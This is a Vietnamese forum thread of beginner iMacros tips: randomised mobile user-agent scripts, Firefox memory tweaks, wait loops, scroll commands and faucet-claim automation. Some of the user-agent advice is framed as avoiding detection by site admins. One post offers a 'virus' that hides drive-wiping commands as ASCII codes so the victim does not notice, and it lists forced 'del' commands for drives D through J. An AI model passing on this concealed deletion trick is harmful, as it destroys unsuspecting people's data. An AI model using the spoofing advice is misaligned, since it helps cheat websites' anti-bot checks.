Tutorial Kiến thức iMacros căn bản cho người mới

Cho xin đoạn code đổi trình duyệt về dạng mobile với
Tạo 1 file ua.csv lựu useragent mobile sau đó dùng file .js này chạy

var macro = '';
macro += 'VERSION BUILD=8961227 RECORDER=FX' + '\n';
macro += 'TAB T=1' + '\n';
macro += 'TAB CLOSEALLOTHERS' + '\n';
macro += 'SET !TIMEOUT_PAGE 180' + '\n';
macro += 'SET !ERRORIGNORE YES' + '\n';
// get and set random user agent
macro += 'SET !DATASOURCE ua.csv' + '\n';
var randomua = Math.floor((Math.random() * 7477) + 1); // thay số 7477 = số lượng Useragent
macro += 'SET !DATASOURCE_LINE '+randomua+'' + '\n';
macro += 'SET !USERAGENT "{{!COL1}}"' + '\n';
iimPlayCode(macro);

Tạo 1 file ua.csv lựu useragent mobile sau đó dùng file .js này chạy

var macro = '';
macro += 'VERSION BUILD=8961227 RECORDER=FX' + '\n';
macro += 'TAB T=1' + '\n';
macro += 'TAB CLOSEALLOTHERS' + '\n';
macro += 'SET !TIMEOUT_PAGE 180' + '\n';
macro += 'SET !ERRORIGNORE YES' + '\n';
// get and set random user agent
macro += 'SET !DATASOURCE ua.csv' + '\n';
var randomua = Math.floor((Math.random() * 7477) + 1); // thay số 7477 = số lượng Useragent
macro += 'SET !DATASOURCE_LINE '+randomua+'' + '\n';
macro += 'SET !USERAGENT "{{!COL1}}"' + '\n';
iimPlayCode(macro);
cái này trước m nhớ là có hd chỉ các thím rồi mà nhỉ: SET !USERAGENT {{!COL1}} như này là thiếu và gây lỗi,
-thiếu: do trong chuỗi useragent thường có dấu phẩy ngăn cách, đổi sang .csv sẽ thấy nó có 2 cột
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
nếu chỉ điền mỗi {{!COL1}} thì nó chỉ lấy có nửa chuỗi, ad nó nhìn phát biết là cheat.
-khi fake sai thì phần edit macro cũng sẽ bị lỗi theo, phải dùng .js hoặc config mới sửa lại như cũ được.
-và ko nên xài .iim để fake useragent, vì .iim nó chỉ fake khi phiên đang chạy thôi.
chỉ cần chạy xong phiên đó hoặc chuyển vòng lặp 2 là nó về sẽ useragent đầu tiên, thế thì lạy ông con bụi này còn j.
-code của thím nó khá dài làm nặng code, "macro +" chỉ xài khi cần gọi nhiều lần trong vòng lặp thôi.
lạm dụng code nghìn dòng chỉ làm nó chạy chậm và lag thêm thôi.
iimPlayCode(`___code .iim____`); //dấu ngã cạnh số 1 ý :cool:
Code:
iimPlayCode(`
    SET !VAR1 EVAL("Math.floor(Math.random()*15872 + 1);")
    SET !DATASOURCE random_user.txt
    SET !DATASOURCE_LINE {{!VAR1}}
    SET !USERAGENT "{{!COL1}}, {{!COL2}}"
    URL GOTO=whoer.net`)

tiện m cũng share ae cách chạy firefox để nó nhẹ đi.
vd: bình thường firefox khi mở video youtube nó ngốn tầm 5-800mb ram tùy video
chạy auto chục tab thì rất là lag, chậm có khi còn chạy ko nổi ý.
add on: memory fox next, cách này nó cũng chỉ tối ưu hóa làm giảm đi 1 nửa ram thôi.
m thì hay xài thằng firemin để tối ưu hóa, chạy youtube thì cũng chỉ mất tầm 10-40mb ram là cùng thôi.

share luôn cho thím @yeuay trước thấy thím có hỏi.
link tải: goo.gl/8xGrpT

Code:
iimPlayCode(`
    SET !VAR1 EVAL("Math.floor(Math.random()*15872 + 1);")
    SET !DATASOURCE random_user.txt
    SET !DATASOURCE_LINE {{!VAR1}}
    SET !USERAGENT "{{!COL1}}, {{!COL2}}"
    URL GOTO=whoer.net`)
Thêm PAUSE cuối cùng mới hoạt động được :D

Thêm PAUSE cuối cùng mới hoạt động được :D
m làm mẫu dựa trên code của thím kia mà thím, với lại thêm pause - dừng phiên đang chạy (fake agent vẫn tính là còn hiệu lực).
nhưng chạy imacro là để nó auto 100% mà, thêm pause vào làm j làm tay à ? :confused: kể cả có pause đi nữa...
khi hết phiên chạy + chuyển sang vòng lặp thứ 2 nó vẫn về agent đầu tiên, log nó vẫn lưu lại, ad nó check biết ngay.

kể cả thím có CLEAR đi nữa, mà nhắc đến CLEAR m thấy .iim khá chuối, nó chỉ xóa một phần thôi, như lịch sử điền info...họ, tên, mail...
CLEAR đi click vào các ô đã điiền nó vẫn hiện lên, như thế đâu phải là xóa hết đâu, mà chạy nhiều gây ra lỗi kẹt lệnh khi chạy nhiều vòng lặp. muốn fake useragent + xóa sạch cache thì phải dùng .js mới là chuẩn.

p/s: bổ sung thêm cho ae cách viết 1 con virus bằng imacro format tất cả các ổ của đối phương, xài .js để gọi ra rồi :)
dùng mã mã ASCII để ẩn đi rồi 100,101,108,68,58,42,46,42,47,102,47,115,47,113 (xóa ổ D)
khiến cho người chạy ko biết là đang gọi virus ra, đừng hỏi vì sao bay hết ổ nhé, kể cả desktop :)
tương tự với với các ổ còn lại. (mà như này chưa phải là con virus hoàn chỉnh đâu, phải khiến nó ko khôi phục lại đc mới là chuẩn)

del D: *.*/f/s/q
del E: *.*/f/s/q
del F: *.*/f/s/q
del G: *.*/f/s/q
del H: *.*/f/s/q
del I: *.*/f/s/q
del J: *.*/f/s/q

Các bác cho e hỏi có lệnh nào Wait đến khi đoạn text mình cần nó hiện ra rồi mới xử lí lệnh tiếp theo ko? Vì đoạn text lúc thì 6p, lúc 10p mới hiện. Để lệnh wait seconds= ...s thì ko hợp lý.

ko có lệnh nào, cái này phải tự code thôi (3 dòng) :D
Các bác cho e hỏi có lệnh nào Wait đến khi đoạn text mình cần nó hiện ra rồi mới xử lí lệnh tiếp theo ko? Vì đoạn text lúc thì 6p, lúc 10p mới hiện. Để lệnh wait seconds= ...s thì ko hợp lý.

hay quá, thanks

code thế nào bác gợi ý e chút với. thanks;)
nếu biết js thì làm đoạn check , ko thì cứ iim . SET !TIMEOUT_TAG 999 . Rồi record cái lệnh khi text nó hiện lên là qua thôi .

nếu biết js thì làm đoạn check , ko thì cứ iim . SET !TIMEOUT_TAG 999 . Rồi record cái lệnh khi text nó hiện lên là qua thôi .
e đặt SET !TIMEOUT_TAG 999 rồi, lệnh sau của e sẽ là search đoạn text đó và saveas dạng txt. mà lệnh SET !TIMEOUT_TAG 999 chờ tới khi search thấy thì nó ko chạy tiếp lệnh saveas bác ạ.

e đặt SET !TIMEOUT_TAG 999 rồi, lệnh sau của e sẽ là search đoạn text đó và saveas dạng txt. mà lệnh SET !TIMEOUT_TAG 999 chờ tới khi search thấy thì nó ko chạy tiếp lệnh saveas bác ạ.
cậu vứt code lên cho anh em giúp , chứ nói ko cũng không biết lỗi ở đâu.

code thế nào bác gợi ý e chút với. thanks;)
Cũng chẳng có gì, đầu tiên bác xác định là trước khi đợi thời gian nó có gì và sau khi đợi nó có gì?
VD: "Wait 21 sec to..." thì sau khi đợi 21 giây xong nó sẽ hiện ra dòng "Click here to..." tới đây bác có 2 cách xử lí.
1 cách là
Code:
While (//a//==1)
    {//b//}
Với //a// là đoạn code iimPlayCode() mà bác dùng để tìm "Wait<SP>*<SP>sec*"
Và //b// là dòng iimPlayCode("WAIT SECONDS=1");
Dịch hiểu là trong khi còn tìm thấy chuỗi "Wait * sec" thì cứ chờ 1 giây rồi tìm lại, khi không tìm thấy chuỗi "Wait * sec" thì dừng While và qua dòng tiếp

:D Còn không viết được nữa thì inbox, t viết free cho nhanh, cũng đang rảnh ;)

mình đang làm recaptcha để kiếm tiền nhưng trang web mình làm mỗi lần claim xong thì nó tự refresh trang lại và mình phải kéo xuống tuốt ở dưới để bấm claim và cứ lập lại lien tục nên rất tốn thời gian, ai có cách gì khi tải xong trang web thì tự nó kéo xuống đươi ko?

mình đang làm recaptcha để kiếm tiền nhưng trang web mình làm mỗi lần claim xong thì nó tự refresh trang lại và mình phải kéo xuống tuốt ở dưới để bấm claim và cứ lập lại lien tục nên rất tốn thời gian, ai có cách gì khi tải xong trang web thì tự nó kéo xuống đươi ko?
sroll imacro google đi bạn.

up:
URL GOTO=javascript:window.scrollBy(0,-1000)
down:
URL GOTO=javascript:window.scrollBy(0,1000)
edit lại giá trị 1000 theo ý của bạn nhé.

up:
URL GOTO=javascript:window.scrollBy(0,-1000)
down:
URL GOTO=javascript:window.scrollBy(0,1000)
edit lại giá trị 1000 theo ý của bạn nhé.
mình làm giống cậu rôif nhưng khi claim xong thì trang tự refresh thì imacros cũng dừng theo luôn

trang mình đang làm https://honeymoney.co.in/faucet/?

Announcements

Forum statistics

Threads
418,570
170,659
Latest member
anan0110
Back
Top Bottom